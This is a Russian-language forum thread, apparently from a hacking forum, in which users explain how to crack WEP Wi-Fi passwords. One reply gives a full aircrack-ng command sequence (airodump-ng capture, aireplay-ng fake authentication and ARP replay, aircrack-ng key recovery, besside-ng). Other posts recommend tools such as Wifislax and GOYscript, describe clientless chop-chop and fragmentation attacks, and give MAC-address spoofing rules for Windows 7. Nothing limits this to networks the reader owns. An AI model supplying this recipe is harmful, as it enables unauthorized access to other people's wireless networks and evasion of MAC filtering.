А в остальном все то же самое? Нужно тоже словить пакет хэндшейк? Он будет не зашифрован что ли? В карте раздела о WEP не нашел информацию.
При шифровании WEP хендшейков нет, - в этом случае нужно собрать достаточное количество DATA-пакетов с IVs. Для атак на WEP также не нужен словарь, там есть более оптимальные и быстрые атаки, реализованные в aircrack-ng. Здесь это определённо было, но поскольку этот тип шифрования устарел, посты посвящённые WEP могли сильно утонуть в глубине форума.
Точно ссылкой не метну, но из памяти всплывает то, что в аиркраке есть встроенная тулза для взлома WEP ... Почитайте мануал по аиркраку. И,да. Не хотелось, но. Инструкций от школоты "как взламать вайфай" в Сети тысячи. И 99 процентов из них описывают именно способ взлома WEP.
Инструкций то много, но читать их все нет смысла, так как вероятно много из них устарело и о лучших и наиболее актуальных способах взлома WEP знают те кто этим занимается. Всегда лучше чтобы "человек который в теме" подсказал, чем читать устаревшие статьи. Спасибо за ответы, буду читать про AirCrack.
Вы немного неверно понимаете суть вопроса. WEP сам по себе устаревший. Именно из-за его бажности его заменили на более совершенные. Сама по себе сеть с WEP - большая редкость. А протокол "как был так и остался" в части защиты. Никаких ухищрений никто придумывать для веп не стал, его просто заменили. Отсюда и способы взлома - остались ровно те же. Удачи!
я бы посоветовал установить ещё СБОРКУ wifislax,там есть такой скрипт GOYscript WEP.Он без труда разделывается с этим шифрованием.При желании Wifislax легко устанавливается на диск C БЕЗ ВСЯКИХ ОТКУСЫВАНИЙ памяти от диска .Почитай это https://forum.antichat.ru/threads/423233/page-1 Там ещё yx-ex советовал устанавливать на диск С Здесь страниц немного но пользы будет много
раз уж появилось желание с пакетом aircrack покопаться: Spoiler: WEP открыть несколько окон терминала TERMINAL #1: airodump-ng -c X --bssid **:**:**:**:**:** -w /......./output mon0 указать путь для сбора пакетов ------------------ TERMINAL #2: (соединение с точкой доступа) aireplay-ng -1 0 -e <name_AP> -a **:**:**:**:**:** -h <My:MAC:X:X:X> mon0 должны получить: 18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful ---------------- TERMINAL #3 (создание траффика) aireplay-ng -3 -b **:**:**:**:**:** -h <My:MAC:X:X:X> mon0 получаем что-то похожее на: Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets... и ждём сбора ~20000-25000 пакетов ----------------------------------- **:**:**:**:**:** - BSSID <name_AP> - имя сети - ESSID <My:MAC:X:X:X> - MAC вашего адаптера узнаём по ifconfig в терминале ----------------------------------- получение пароля: aircrack-ng -z output*.cap ###################################### или: besside-ng -b **:**:**:**:**:** mon0 (besside-ng есть в Aircrack-ng 1.2)
Помню, была ещё атака на WEP даже без подключённого клиента. Генерировался специально сформированный трафик на точку и анализировались её ответы.
это в какой сборке есть такая атака?c клиентами-минут 3-5 и пароль в кармане,а там за сколько ломалось
Это реализовано в aircrack-ng со связкой aireplay-ng и packetforge-ng. Точных команд не назову, но они у меня были записаны где-то.
Без клиента ломают атаки chop-chop и fragmentation,но только если нет фильтрации по мак или если точка не использует (SKA) shared key authentication.Тогда,нужен клиент.Я использую для этого Feeding bottle.Если сигнал хороший то ломаются тоже за пару минут.
-h : Hides known stations for --showack * * * Filter options: --encrypt <suite> : Filter APs by cipher suite --netmask <netmask> : Filter APs by mask --bssid <bssid> : Filter APs by BSSID --essid <essid> : Filter APs by ESSID --essid-regex <regex> : Filter APs by ESSID using a regular expression -a : Filter unassociated clients * * * --channel <channels> : Capture on specific channels
Т.е. я не вижу в promiscuous mode пакеты которые до меня доходят только потому что драйвер Wi-Fi адаптера игнорирует их ? Бываю сторонние драйвера которые можно установить что бы видеть все ? В режиме Monitor я вижу все пакеты которые до меня доходят или драйвер и в этом случае тоже фильтрует пакеты ?
Пробовал делать по этой инструкции И на определенном этапе мне написало это: http://imgur.com/a/e7ZcU попробовал написать airdump-ng, написало что такой команды нет.
Кто нибудь юзал утилиту NetSetMan по виндой? Она умeет менять Мак адреса Wi-Fi адаптера вместе с сетевым профилем ? Вроде как нашла в программке пункт мак адрес, вставляю мак но он не меняется.
- под какой виндой? если под 7 то там правило существует: Маки в Windows 7 на встроенные сетевые карты , меняются без проблем всеми старыми способами при соблюдении следующего правила: XY:XX:XX:XX:XX:XX , где Y = 2 , 6 , А или Е , а X - Любое число.